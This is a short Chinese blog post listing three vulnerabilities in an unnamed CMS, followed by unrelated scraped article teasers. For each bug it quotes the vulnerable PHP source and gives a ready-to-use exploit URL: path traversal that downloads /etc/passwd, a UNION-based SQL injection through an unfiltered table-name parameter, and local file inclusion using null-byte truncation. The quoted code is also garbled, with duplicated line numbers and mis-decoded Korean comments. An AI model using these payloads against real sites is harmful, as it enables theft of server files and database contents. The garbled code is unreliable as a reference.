n3tl04d
n3tl04d

某某cms漏洞

一、下载漏洞

看down_func.php代码

 

  
  
  
  
    
   
   
   
   
  1. <? 
    2. 
   
   
   
   
  2. if ( strstr($HTTP_USER_AGENT,"MSIE 5.5")) { 
    3. 
   
   
   
   
  3.     header("Content-Type: doesn/matterrn"); 
    4. 
   
   
   
   
  4.     header("Content-Disposition: filename=$dnfile"); 
    5. 
   
   
   
   
  5.     header("Content-Transfer-Encoding: binaryrn"); 
    6. 
   
   
   
   
  6. else { 
    7. 
   
   
   
   
  7.   Header("Content-Disposition: attachment; filename=$dnfile"); 
    8. 
   
   
   
   
  8.   Header("Content-type: file/unknown"); 
    9. 
   
   
   
   
  9.   Header("Content-Length: ".(string)(filesize("$file"))); 
    10. 
   
   
   
   
  10.   Header("Content-Description: PHP3 Generated Data"); 
    11. 
   
   
   
   
  11.   Header("Pragma: no-cache"); 
    12. 
   
   
   
   
  12.   Header("Expires: 0"); 
    13. 
   
   
   
   
    14. 
   
   
   
   
  14. if(is_file("$file")){ 
    15. 
   
   
   
   
  15.     $fp = fopen("$file","r"); 
    16. 
   
   
   
   
  16.     if (!fpassthru($fp)){fclose($fp); 
    17. 
   
   
   
   
  17.     } 
    18. 
   
   
   
   
  18. }else
    19. 
   
   
   
   
  19.     echo "颇老捞 绝绢夸~~"
    20. 
   
   
   
   
    21. 
   
   
   
   
  21. ?> 
    22.

 

未做任何过滤 直接down_fun.php?file=../../../../../../../etc/passwd&dnfile=/etc/passwd

二、注入漏洞

还是看代码,board_modify.php

 

 

  
  
  
  
    
   
   
   
   
  1.     include_once "inc/common.php"
    2. 
   
   
   
   
  2.     include "$skin_dir/nc_css.php"
    3. 
   
   
   
   
  3.  
    4. 
   
   
   
   
  4. $nquery = "select tb.link1,tb.link2,tb.name,tb.passwd, tb.email,tb.html_yn, tb.head,tb.wdate,tb.ip,tb.fileup1, tb.userfile1,tb.fileup2, tb.userfile2, tb.click_hit, tb.mark_hit, tt.content,tb.view_secret from NC_bbs_".$NC_id." tb, NC_text_".$NC_id." tt where tb.num='$TB_id' and tt.index1='$TB_id'"//$NC_id未做过滤哦 
    5. 
   
   
   
   
  5. $nresult = mysql_query($nquery); 
    6. 
   
   
   
   
  6. $md_row = mysql_fetch_object($nresult);
    7. 
  
  
  
  

  
  
  
  
    
   
   
   
   
  1.  
    2.

board_modify.php?TB_id=8&NC_id=4  tb, NC_text_4 tt where tb.num=8 and tt.index1=8 and 1=2 UNION SELECT 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17 from  --

三、本地包含

auth_user.php文件

 

  
  
  
  
    
   
   
   
   
  1. <? 
    2. 
   
   
   
   
  2. include_once("$SHOP_includefile/login_session_check.php");      // 雀盔肺弊牢 眉农 窃荐颇老 
    3. 
   
   
   
   
  3.  
    4. 
   
   
   
   
  4. if(LOGIN_CHECK()==true) { 
    5. 
   
   
   
   
  5.     $grade_array = explode('|'base64_decode($_SESSION['k2comGRADE']) );   // 2005.06.22 眠啊 
    6. 
   
   
   
   
  6.     $grade_my = $grade_array[0]; 
    7. 
   
   
   
   
  7. }else
    8. 
   
   
   
   
  8.     $grade_my = 0;          // 厚雀盔老 版快 
    9. 
   
   
   
   
    10.

 

board_inc/auth_user.php?SHOP_includefile=xx.php%00

如果命好能截断的话,呵呵

 

可惜没上传漏洞 :)

 

 

 

你可能感兴趣的:(漏洞,cms,职场,休闲)

  • 2025最全 Java 面试八股文(持续更新) 关注我学java java面试开发语言
    Java面试Java面试随着时间的改变而改变。在过去的日子里,当你知道String和StringBuilder的区别就能让你直接进入第二轮面试,但是现在问题变得越来越高级,面试官问的问题也更深入。在我初入职场的时候,类似于Vector与Array的区别、HashMap与Hashtable的区别是最流行的问题,只需要记住它们,就能在面试中获得更好的机会,但这种情形已经不复存在。如今,你将会被问到许多
  • 从零开始搭建搜索推荐系统(五十四)多路召回之万剑归宗 hanyi_ 搜索推荐javajava搜索系统
    聊的不止技术。跟着小帅写代码,还原和技术大牛一对一真实对话,剖析真实项目筑成的一砖一瓦,了解最新最及时的资讯信息,还可以学到日常撩妹小技巧哦,让我们开始探索主人公小帅的职场生涯吧!(PS:本系列文章以幽默风趣风格为主,较真侠和杠精请绕道~)一、奶茶引发的血案(会议室里,行服小姐姐把笔记本往桌上一拍,屏幕上是密密麻麻的搜索日志)行服姐姐:"小帅!你自己看看!用户搜'朝阳区低糖芝士草莓冰沙',你家系统
  • 2024年最新【AcWing】蓝桥杯集训每日一题Day7 贡献法 4261,2024年最新2024春招面试 2401_84976300 程序员c语言c++学习
    网上学习资料一大堆,但如果学到的知识不成体系,遇到问题时只是浅尝辄止,不再深入研究,那么很难做到真正的技术提升。需要这份系统化的资料的朋友,可以添加戳这里获取一个人可以走的很快,但一群人才能走的更远!不论你是正从事IT行业的老鸟或是对IT行业感兴趣的新人,都欢迎加入我们的的圈子(技术交流、学习资源、职场吐槽、大厂内推、面试辅导),让我们一起学习成长!是一个数学思想,在枚举一些数的时候,有些枚举可能
  • 4年产品经理工作总结,这3个问题没想清楚一辈子都是初级产品(附AI产品经理福利) Langchain 产品经理人工智能语言模型langchain大模型LLMai产品经理
    笔者将这4年产品工作的所思,所悟,所得进行总结,总结起来就是3个方面:关于学习成长,关于交流分享,关于职场选择。希望分享的内容对产品新人们有所帮助,也希望能和产品老鸟们多多交流,毕竟讨论使人完备!本文金字塔结构如下图所示:一、关于学习成长产品经理这个职位有些类似于中国的博士入学考试,宽进严出,想要完成从产品专员->产品经理->高级产品经理->产品总监的升级之路可谓非常之难,抛开运气因素,对一个人的
  • 22. dirmap:高级 Web 目录与文件扫描工具 白帽少女安琪拉 安全工具网络安全网络
    1.1项目介绍dirmap是一款功能强大的Web目录与文件扫描工具,专注于快速发现目标网站的隐藏路径、敏感文件及未授权接口。其通过多线程、递归扫描和智能过滤机制,显著提升扫描效率与准确性,适用于红队渗透、漏洞挖掘及资产测绘等场景。1.1.1核心功能多线程扫描:默认50线程,可自定义调整以平衡性能与隐蔽性。智能结果过滤:自动排除重复状态码(如404)。支持正则匹配响应内容,识别动态路由(如/user
  • ida调试linux程序,MAC使用IDA PRO远程调试LINUX程序 O超哥 ida调试linux程序
    1背景在学习Linux系统上的一些漏洞知识的时候,往往需要进行“实地测试”,但是在Linux系统上进行调试并不太方便,因为LINUX自带的GDB调试工具真的不太人性化,即使有GDBTUI之类的“伪图形界面调试器”,也跟IDAPRO之类的调试器相差甚远。这里又遇到另一个问题了——LINUX平台的IDAPRO不太好找。综上,对于初学者而言最佳方案就是使用IDAPRO的远程调试功能!2环境配置本文主要说
  • 附原文 |《2024年漏洞与威胁趋势报告》深度解读 漏洞
    在信息技术飞速发展的当下,网络安全已然成为全球瞩目的焦点。安全极客社区精心译制的《2024年漏洞与威胁趋势报告》明确指出,2023年堪称网络安全领域的重要分水岭。这一年,新发现漏洞的数量出现了前所未有的增长态势,其中高危或严重级别的漏洞占比高达一半,漏洞利用的时间线显著缩短,然而平均修复时间却过长。金融服务、制造业以及公用事业等行业面临的网络威胁愈发严峻,首席信息安全官所承担的法律责任也日益加重。
  • 零基础转行学网络安全怎么样?能找到什么样的工作? 网络安全苏柒 web安全安全计算机网络网络安全转行黑客工作
    网络安全对于现代社会来说变得越来越重要,但是很多人对于网络安全的知识却知之甚少。那么,零基础小白可以学网络安全吗?答案是肯定的。零基础转行学习网络安全是完全可行的,但需要明确的是,网络安全是一个既广泛又深入的领域,包含了网络协议、系统安全、应用安全、密码学、渗透测试、漏洞挖掘、安全编程、安全运维等多个方面。。网络安全是一个快速发展的领域,对专业人才的需求不断增长。以下是一些关于零基础转行学习网络安
  • 接口测试中常见的问题有哪些? Feng.Lee 漫谈测试可用性测试测试工具接口测试API测试
    目录一、请求参数问题必填字段缺失参数数据类型错误边界值或超限值问题参数组合错误二、响应结果问题HTTP状态码错误数据结构不符合预期业务逻辑错误数据一致性错误三、异常场景处理不足未处理异常输入未处理超时或服务不可用重复请求问题四、安全相关问题鉴权缺失或漏洞敏感数据未加密越权访问五、性能问题高并发下接口崩溃资源泄漏响应时间过长接口测试需关注:我们在进行测试时候,好多测试不方便在页面中进行执行,接口测试
  • DeepSeek对于普通打工人来说有什么帮助呢? 人工智能
    在当今快速变化的社会中,普通打工人面临着越来越多的挑战:职场竞争加剧、技能更新换代加快、工作与生活的平衡难以掌控等。在这样的背景下,如何提升自身竞争力、找到适合自己的职业发展路径,成为了每个打工人都需要思考的问题。而DeepSeek,作为一款基于人工智能和大数据分析的职业发展工具,正在为普通打工人提供全新的解决方案。本文将从多个角度探讨DeepSeek对于普通打工人的帮助,分析它如何通过职业规划、
  • 【漏洞复现】用友NC-accept-任意文件上传 .Rain. 漏洞复现web安全漏洞复现
    目录0x01产品简介0x02漏洞概述0x03网络测绘0x04漏洞复现0x05Nuclei0x01产品简介用友NC是北京用友软件股份有限公司(简称“用友”)开发的一款企业管理软件,支持财务会计、人力资源、供应链、生产制造、客户关系管理等多个业务领域,涵盖了企业核心业务及管理流程。用友NC是基于B/S架构的软件系统,提供基于云计算、SaaS模式、本地部署等多种部署方式,广泛应用于国内外众多中小型企业和
  • VulnHub靶机系列:Os-ByteSec 墨痕诉清风 国际证书研究网络linux服务器
    一前言Vulnhub是一个提供各种漏洞环境的靶场平台,供安全爱好者学习渗透使用,大部分环境是做好的虚拟机镜像文件,镜像预先设计了多种漏洞,需要使用VMware或者VirtualBox运行。每个镜像会有破解的目标,大多是Boot2root,从启动虚机到获取操作系统的root权限和查看flag。网址:https://www.vulnhub.com二运行说明靶机名称:Os-Bytesec靶机难度:初学者
  • ssl和tsl的区别及如何使用 噔噔噔噔@ ssl网络协议网络
    SSL(SecureSocketsLayer)和TLS(TransportLayerSecurity)都是用于加密和保护网络通信安全的协议。TLS实际上是SSL的升级版本,更加安全和强大。下面是它们之间的主要区别以及如何使用它们:区别:SSL是最早用于加密网络通信的协议,随着安全漏洞的暴露,逐渐被TLS所取代。TLS提供了更强大的加密算法和更严格的安全性要求,相比SSL更安全可靠。SSL和TLS之
  • android系统架构的前世今生,事件分发机制面试题 code高级开源 Android经验分享面试
    前言一位网友在职场论坛上发了一个帖子,他说自己今年三十七岁了,是一名Android老兵,因为和上家公司的领导闹矛盾有了嫌隙,一气之下就裸辞了,如今已经辞职四个月了,也失业了四个月。每天都在努力投简历,共投出去了五百封简历,但只有三家通知自己过去面试,其他的都石沉大海。自己很纳闷,就找了一个做猎头的朋友询问,朋友说自己已经超龄了,没有什么岗位可以给自己这个年龄的人了,只有少数的能放宽到四十岁,但也不
  • 红队OPSEC(安全运营)个人总结 安全检测中 安全
    OPSEC又称:运营安全,是指在红队的视角下,蓝队对我方的威胁。OPSEC漏洞的五个流程:关键信息识别:指红队的关键信息不泄露,包括但不限于红队的攻击意图,能力,人员,活动及限制等。威胁分析:指蓝队的操作可能发现我方行动的威胁,如使用同一个IP地址进行nmap和msf等漏洞分析:指蓝队成员已发现我方行动或关键信息,并对其进行防范的行为,如封禁红队使用的IP等。风险评估:指对事件发生的概率和预期成本
  • JavaScript泄露浏览器插件信息引发的安全漏洞及防护措施 w2361734601 网络web安全安全
    本文所述技术原理、漏洞案例及防御方案仅用于安全研究交流,旨在提升网络安全防护意识。任何试图利用文中提及的技术手段进行非法攻击的行为,均与作者/发布方无关。目录引言:被忽视的信息泄露风险一、插件信息泄露的三大途径1.Navigator.plugins对象检测2.MIME类型检测3.特性嗅探技术二、漏洞利用的典型案例1.已知漏洞直接利用2.精准社会工程攻击3.零日漏洞预埋攻击三、四层防御体系构建1.客
  • vLLM 部署大语言模型的系统选择策略 由数入道 人工智能语言模型人工智能自然语言处理VLLM
    核心选型原则指标权重说明CUDA支持⭐⭐⭐⭐⭐直接影响GPU加速性能,需确保系统与NVIDIA驱动和CUDA工具链的兼容性软件源时效性⭐⭐⭐⭐系统需提供较新的Python、PyTorch等AI框架版本,避免依赖冲突长期支持(LTS)⭐⭐⭐⭐生产环境需规避因系统版本过期导致的安全漏洞和兼容性问题社区生态⭐⭐⭐活跃的开发者社区能快速解决部署问题,降低运维成本企业级支持⭐⭐需要SLA保障的商业场景需考虑
  • iOS安全和逆向系列教程 第7篇:iOS应用静态分析实战 自学不成才 iOS安全和逆向系列教程ioscocoamacos
    iOS安全和逆向系列教程第7篇:iOS应用静态分析实战作者:自学不成才在上一篇文章中,我们深入探讨了Mach-O文件格式的结构和分析方法。本篇文章将继续我们的iOS逆向工程之旅,重点介绍iOS应用的静态分析技术。静态分析是指在不运行程序的情况下,通过分析应用的二进制文件来理解其功能和行为。这是逆向工程过程中必不可少的一步,能够帮助我们发现应用的核心逻辑、安全机制和潜在漏洞。静态分析的意义与目标在开
  • 文件上传复现 是懒羊羊吖~ android
    1.PHPCMSPHPCMS头像上传功能允许用户上传ZIP压缩包,系统自动解压并删除非图片文件(如.php、.txt),利用解压后文件保留机制上传至服务器‌,使用特殊符号混淆文件名(如shell.txt?.php#.jpg),使系统误判为图片文件‌但未严格校验文件真实类型及内容,导致攻击者可构造特殊压缩包绕过删除逻辑,保留恶意文件‌//1.接收用户上传的ZIP压缩包并直接写入临时文件 file_p
  • 每周一个网络安全相关工具——MetaSpLoit w2361734601 web安全安全msf6MetaSpLoit
    一、Metasploit简介Metasploit(MSF)是一款开源渗透测试框架,集成了漏洞利用、Payload生成、后渗透模块等功能,支持多种操作系统和硬件平台。其模块化设计(如exploits、auxiliary、payloads等)使其成为全球最受欢迎的渗透测试工具之一二、安装与更新KaliLinux默认集成Kali系统自带Metasploit,通过命令msfconsole启动。若需手动安装
  • 《Linux 运维网络安全:全民关注时代,你该如何行动?》 TechStack 创行者 Linux#服务器容器网络linux安全服务器web安全
    Linux运维中的网络安全秘籍:从隐患排查到全面防护在数字化浪潮汹涌的当下,网络安全已然成为企业与个人数据资产的“守护神”。尤其是在Linux运维领域,一旦安全防线出现漏洞,后果不堪设想。你是否想过,为何有些企业的Linux服务器能在复杂网络环境中“稳如泰山”,而有些却频繁遭受攻击,数据泄露风险剧增?今天,就让我们一同深入Linux运维的网络安全世界,探寻其中的奥秘。权限管理:严守访问关卡在Lin
  • 应急响应——勒索病毒风险处置 ad_m1n 书籍工具资料收集安全面试
    勒索病毒简介勒索病毒是一种电脑病毒,其性质恶劣、危害极大,一旦感染将给用户带来无法估量的损失。这种病毒主要以邮件、程序木马、网页挂马的形式进行传播,并利用各种加密算法对文件进行加密,使得被感染者一般无法解密,必须拿到解密的私钥才有可能破解勒索病毒发作的特征传播方式:勒索病毒主要通过三种途径传播,包括漏洞、邮件和广告推广。其中,通过漏洞发起的攻击占攻击总数的绝大部分,因为老旧系统(如win7、xp等
  • VMware ESX曝3个0Day漏洞,已被黑客利用 FreeBuf- 网络安全web安全
    Broadcom公司近日修复了VMwareESX产品中的三个0Day漏洞,这些漏洞已被恶意利用。漏洞概述Broadcom发布了安全更新,以修复VMwareESX产品中的三个0Day漏洞。这些漏洞分别被标识为CVE-2025-22224、CVE-2025-22225和CVE-2025-22226,影响了多个VMwareESX产品,包括VMwareESXi、vSphere、Workstation、Fu
  • 重大安全威胁!全球近5W个访问管理系统存在严重安全漏洞 FreeBuf- 安全网络web安全
    荷兰IT安全咨询公司Modat发现,全球范围内部署的约49,000个访问管理系统(AMS)存在严重的安全漏洞。这些系统本应通过密码、生物识别和多因素认证等身份验证方法控制建筑物访问,然而却因关键配置错误导致敏感数据暴露,使设施面临未经授权进入的风险。此次发现暴露了一个跨越多个领域的重大全球性安全威胁,涉及医疗、教育、制造、建筑、石油行业和政府机构等。漏洞带来双重威胁访问管理系统通过多种方法验证用户
  • [网络安全自学篇] 一.入门笔记之看雪Web安全学习及异或解密示例 鱼馬 网络网络安全web安全笔记测试工具职场和发展
    最近开始学习网络安全相关知识,接触了好多新术语,感觉自己要学习的东西太多,真是学无止境,也发现了好几个默默无闻写着博客、做着开源的大神。准备好好学习下新知识,并分享些博客与博友们一起进步,加油。非常基础的文章,大神请飘过,谢谢各位看官!文章目录一.工具&术语1.网安术语2.常用工具3.推荐文章二.常见攻击1.SQL注入2.XSS跨站3.越权漏洞4.CSRF跨站请求伪造5.支付漏洞三.音乐异或解密示
  • 第一篇:CTF入门指南:了解CTF的基本概念与比赛形式 菜腿承希 零基础小白入门CTFpythonjava网络安全前端
    #零基础小白入门CTF解题到成为CTF大佬系列文章##引言CTF(CaptureTheFlag)是一种网络安全竞赛,参赛者需要通过解决各种安全相关的题目来获取“Flag”,从而得分。CTF题目通常涵盖密码学、逆向工程、漏洞利用、Web安全等多个领域。本系列文章将从零基础开始,逐步带你了解CTF的各个知识点,最终帮助你成为一名CTF大佬。##文章目录1.**CTF入门指南:了解CTF的基本概念与比赛
  • 编程与脚本基础:网络安全的核心工具 菜腿承希 零基础网络安全web安全安全
    ###编程与脚本基础:网络安全的核心工具在上一篇教程中,我们探讨了操作系统和网络的基础知识。今天,我们将进入网络安全领域的另一个核心技能——编程与脚本。无论是自动化任务、开发安全工具,还是进行漏洞分析,编程和脚本都是网络安全从业者不可或缺的技能。本文将从编程基础入手,逐步引导你掌握网络安全中常用的编程语言和脚本技术。---####1.**为什么学习编程与脚本?**编程与脚本在网络安全中扮演着重要角
  • seacmsv9注入 2022计科一班唐文 oracle数据库
    一、当注入时,information_schema被禁用的解决方法information_schema数据库是MySQL和其他一些数据库系统中存储元数据的标准视图,包含表、列、权限等信息。攻击时可以直接查询这些信息来获取数据库结构,比如表名和列名。当information_schema被禁用时需要寻找其他途径来获取必要的信息。在information_schema数据库中储存了整个MySQL服务器
  • 第二篇:CTF常见题型解析:密码学、逆向工程、漏洞利用、Web安全 菜腿承希 零基础小白入门CTFweb安全网络安全
    #零基础小白入门CTF解题到成为CTF大佬系列文章##第二篇:CTF常见题型解析:密码学、逆向工程、漏洞利用、Web安全###引言在CTF比赛中,题目类型多种多样,涵盖了网络安全领域的多个方向。掌握这些题型的解题方法,是成为CTF大佬的关键。在本篇文章中,我们将详细解析CTF中常见的四大题型:密码学、逆向工程、漏洞利用和Web安全,帮助你快速入门并掌握解题技巧。---##2.1密码学(Crypto
  • 测试江湖:为什么大多数人宁愿吃生活的苦,也不愿意吃学习的苦 爱吃 香菜 软件测试自动化测试职场经验学习软件测试自动化测试测试工具职场经验程序员功能测试
    面试求职:「面试试题小程序」,内容涵盖测试基础、Linux操作系统、MySQL数据库、Web功能测试、接口测试、APPium移动端测试、Python知识、Selenium自动化测试相关、性能测试、性能测试、计算机网络知识、Jmeter、HR面试,命中率杠杠的。(大家刷起来…)职场经验干货:软件测试工程师简历上如何编写个人信息(一周8个面试)软件测试工程师简历上如何编写专业技能(一周8个面试)软件测
  • Java 并发包之线程池和原子计数 lijingyao8206 Java计数ThreadPool并发包java线程池
    对于大数据量关联的业务处理逻辑,比较直接的想法就是用JDK提供的并发包去解决多线程情况下的业务数据处理。线程池可以提供很好的管理线程的方式,并且可以提高线程利用率,并发包中的原子计数在多线程的情况下可以让我们避免去写一些同步代码。     这里就先把jdk并发包中的线程池处理器ThreadPoolExecutor 以原子计数类AomicInteger 和倒数计时锁C
  • java编程思想 抽象类和接口 百合不是茶 java抽象类接口
    接口c++对接口和内部类只有简介的支持,但在java中有队这些类的直接支持   1 ,抽象类 :  如果一个类包含一个或多个抽象方法,该类必须限定为抽象类(否者编译器报错)   抽象方法 : 在方法中仅有声明而没有方法体    package com.wj.Interface;
  • [房地产与大数据]房地产数据挖掘系统 comsci 数据挖掘
           随着一个关键核心技术的突破,我们已经是独立自主的开发某些先进模块,但是要完全实现,还需要一定的时间...        所以,除了代码工作以外,我们还需要关心一下非技术领域的事件..比如说房地产     &nb
  • 数组队列总结 沐刃青蛟 数组队列
          数组队列是一种大小可以改变,类型没有定死的类似数组的工具。不过与数组相比,它更具有灵活性。因为它不但不用担心越界问题,而且因为泛型(类似c++中模板的东西)的存在而支持各种类型。      以下是数组队列的功能实现代码:   import List.Student; public class
  • Oracle存储过程无法编译的解决方法 IT独行者 oracle存储过程 
    今天同事修改Oracle存储过程又导致2个过程无法被编译,流程规范上的东西,Dave 这里不多说,看看怎么解决问题。   1.     查看无效对象 XEZF@xezf(qs-xezf-db1)> select object_name,object_type,status from all_objects where status='IN
  • 重装系统之后oracle恢复 文强chu oracle
    前几天正在使用电脑,没有暂停oracle的各种服务。 突然win8.1系统奔溃,无法修复,开机时系统 提示正在搜集错误信息,然后再开机,再提示的无限循环中。 无耐我拿出系统u盘 准备重装系统,没想到竟然无法从u盘引导成功。 晚上到外面早了一家修电脑店,让人家给装了个系统,并且那哥们在我没反应过来的时候, 直接把我的c盘给格式化了 并且清理了注册表,再装系统。 然后的结果就是我的oracl
  • python学习二( 一些基础语法) 小桔子 pthon基础语法
    紧接着把!昨天没看继续看django 官方教程,学了下python的基本语法 与c类语言还是有些小差别: 1.ptyhon的源文件以UTF-8编码格式 2. /   除 结果浮点型 //  除 结果整形 %   除 取余数 *   乘 **  乘方 eg 5**2 结果是5的2次方25 _&
  • svn 常用命令 aichenglong SVN版本回退
    1 svn回退版本   1)在window中选择log,根据想要回退的内容,选择revert this version或revert chanages from this version 两者的区别:   revert this version:表示回退到当前版本(该版本后的版本全部作废)   revert chanages from this versio
  • 某小公司面试归来 alafqq 面试
    先填单子,还要写笔试题,我以时间为急,拒绝了它。。时间宝贵。 老拿这些对付毕业生的东东来吓唬我。。 面试官很刁难,问了几个问题,记录下; 1,包的范围。。。public,private,protect. --悲剧了 2,hashcode方法和equals方法的区别。谁覆盖谁.结果,他说我说反了。 3,最恶心的一道题,抽象类继承抽象类吗?(察,一般它都是被继承的啊) 4,stru
  • 动态数组的存储速度比较 集合框架 百合不是茶 集合框架
    集合框架: 自定义数据结构(增删改查等) package 数组; /** * 创建动态数组 * @author 百合 * */ public class ArrayDemo{ //定义一个数组来存放数据 String[] src = new String[0]; /** * 增加元素加入容器 * @param s要加入容器
  • 用JS实现一个JS对象,对象里有两个属性一个方法 bijian1013 js对象
    <html> <head> </head> <body> 用js代码实现一个js对象,对象里有两个属性,一个方法 </body> <script> var obj={a:'1234567',b:'bbbbbbbbbb',c:function(x){
  • 探索JUnit4扩展:使用Rule bijian1013 java单元测试JUnitRule
            在上一篇文章中,讨论了使用Runner扩展JUnit4的方式,即直接修改Test Runner的实现(BlockJUnit4ClassRunner)。但这种方法显然不便于灵活地添加或删除扩展功能。下面将使用JUnit4.7才开始引入的扩展方式——Rule来实现相同的扩展功能。 1. Rule       &n
  • [Gson一]非泛型POJO对象的反序列化 bit1129 POJO
    当要将JSON数据串反序列化自身为非泛型的POJO时,使用Gson.fromJson(String, Class)方法。自身为非泛型的POJO的包括两种: 1. POJO对象不包含任何泛型的字段 2. POJO对象包含泛型字段,例如泛型集合或者泛型类 Data类 a.不是泛型类, b.Data中的集合List和Map都是泛型的 c.Data中不包含其它的POJO    
  • 【Kakfa五】Kafka Producer和Consumer基本使用 bit1129 kafka
    0.Kafka服务器的配置 一个Broker, 一个Topic Topic中只有一个Partition()   1. Producer: package kafka.examples.producers; import kafka.producer.KeyedMessage; import kafka.javaapi.producer.Producer; impor
  • lsyncd实时同步搭建指南——取代rsync+inotify ronin47
    1. 几大实时同步工具比较 1.1 inotify + rsync 最近一直在寻求生产服务服务器上的同步替代方案,原先使用的是 inotify + rsync,但随着文件数量的增大到100W+,目录下的文件列表就达20M,在网络状况不佳或者限速的情况下,变更的文件可能10来个才几M,却因此要发送的文件列表就达20M,严重减低的带宽的使用效率以及同步效率;更为要紧的是,加入inotify
  • java-9. 判断整数序列是不是二元查找树的后序遍历结果 bylijinnan java
    public class IsBinTreePostTraverse{ static boolean isBSTPostOrder(int[] a){ if(a==null){ return false; } /*1.只有一个结点时,肯定是查找树 *2.只有两个结点时,肯定是查找树。例如{5,6}对应的BST是 6 {6,5}对应的BST是
  • MySQL的sum函数返回的类型 bylijinnan javaspringsqlmysqljdbc
    今天项目切换数据库时,出错 访问数据库的代码大概是这样: String sql = "select sum(number) as sumNumberOfOneDay from tableName"; List<Map> rows = getJdbcTemplate().queryForList(sql); for (Map row : rows
  • java设计模式之单例模式 chicony java设计模式
    在阎宏博士的《JAVA与模式》一书中开头是这样描述单例模式的:   作为对象的创建模式,单例模式确保某一个类只有一个实例,而且自行实例化并向整个系统提供这个实例。这个类称为单例类。 单例模式的结构   单例模式的特点: 单例类只能有一个实例。 单例类必须自己创建自己的唯一实例。 单例类必须给所有其他对象提供这一实例。   饿汉式单例类   publ
  • javascript取当月最后一天 ctrain JavaScript
    <!--javascript取当月最后一天--> <script language=javascript> var current = new Date(); var year = current.getYear(); var month = current.getMonth(); showMonthLastDay(year, mont
  • linux tune2fs命令详解 daizj linuxtune2fs查看系统文件块信息
    一.简介: tune2fs是调整和查看ext2/ext3文件系统的文件系统参数,Windows下面如果出现意外断电死机情况,下次开机一般都会出现系统自检。Linux系统下面也有文件系统自检,而且是可以通过tune2fs命令,自行定义自检周期及方式。 二.用法: Usage: tune2fs [-c max_mounts_count] [-e errors_behavior] [-g grou
  • 做有中国特色的程序员 dcj3sjt126com 程序员
      从出版业说起 网络作品排到靠前的,都不会太难看,一般人不爱看某部作品也是因为不喜欢这个类型,而此人也不会全不喜欢这些网络作品。究其原因,是因为网络作品都是让人先白看的,看的好了才出了头。而纸质作品就不一定了,排行榜靠前的,有好作品,也有垃圾。 许多大牛都是写了博客,后来出了书。这些书也都不次,可能有人让为不好,是因为技术书不像小说,小说在读故事,技术书是在学知识或温习知识,有
  • Android:TextView属性大全 dcj3sjt126com textview
    android:autoLink    设置是否当文本为URL链接/email/电话号码/map时,文本显示为可点击的链接。可选值(none/web/email/phone/map/all)  android:autoText    如果设置,将自动执行输入值的拼写纠正。此处无效果,在显示输入法并输
  • tomcat虚拟目录安装及其配置 eksliang tomcat配置说明tomca部署web应用tomcat虚拟目录安装
    转载请出自出处:http://eksliang.iteye.com/blog/2097184 1.-------------------------------------------tomcat  目录结构 config:存放tomcat的配置文件 temp  :存放tomcat跑起来后存放临时文件用的 work   : 当第一次访问应用中的jsp
  • 浅谈:APP有哪些常被黑客利用的安全漏洞 gg163 APP
    首先,说到APP的安全漏洞,身为程序猿的大家应该不陌生;如果抛开安卓自身开源的问题的话,其主要产生的原因就是开发过程中疏忽或者代码不严谨引起的。但这些责任也不能怪在程序猿头上,有时会因为BOSS时间催得紧等很多可观原因。由国内移动应用安全检测团队爱内测(ineice.com)的CTO给我们浅谈关于Android 系统的开源设计以及生态环境。 1. 应用反编译漏洞:APK 包非常容易被反编译成可读
  • C#根据网址生成静态页面 hvt Web.netC#asp.nethovertree
    HoverTree开源项目中HoverTreeWeb.HVTPanel的Index.aspx文件是后台管理的首页。包含生成留言板首页,以及显示用户名,退出等功能。根据网址生成页面的方法:   bool CreateHtmlFile(string url, string path) { //http://keleyi.com/a/bjae/3d10wfax.htm stri
  • SVG 教程 (一) 天梯梦 svg
    SVG 简介 SVG 是使用 XML 来描述二维图形和绘图程序的语言。 学习之前应具备的基础知识: 继续学习之前,你应该对以下内容有基本的了解: HTML XML 基础 如果希望首先学习这些内容,请在本站的首页选择相应的教程。 什么是SVG? SVG 指可伸缩矢量图形 (Scalable Vector Graphics) SVG 用来定义用于网络的基于矢量
  • 一个简单的java栈 luyulong java数据结构
    public class MyStack { private long[] arr; private int top; public MyStack() { arr = new long[10]; top = -1; } public MyStack(int maxsize) { arr = new long[maxsize]; top
  • 基础数据结构和算法八:Binary search sunwinner AlgorithmBinary search
    Binary search needs an ordered array so that it can use array indexing to dramatically reduce the number of compares required for each search, using the classic and venerable binary search algori
  • 12个C语言面试题,涉及指针、进程、运算、结构体、函数、内存,看看你能做出几个! 刘星宇 c面试
    12个C语言面试题,涉及指针、进程、运算、结构体、函数、内存,看看你能做出几个! 1.gets()函数 问:请找出下面代码里的问题: #include<stdio.h> int main(void) {     char buff[10];     memset(buff,0,sizeof(buff));
  • ITeye 7月技术图书有奖试读获奖名单公布 ITeye管理员 活动ITeye试读
    ITeye携手人民邮电出版社图灵教育共同举办的7月技术图书有奖试读活动已圆满结束,非常感谢广大用户对本次活动的关注与参与。 7月试读活动回顾: http://webmaster.iteye.com/blog/2092746 本次技术图书试读活动的优秀奖获奖名单及相应作品如下(优秀文章有很多,但名额有限,没获奖并不代表不优秀): 《Java性能优化权威指南》
按字母分类: ABCDEFGHIJKLMNOPQRSTUVWXYZ其他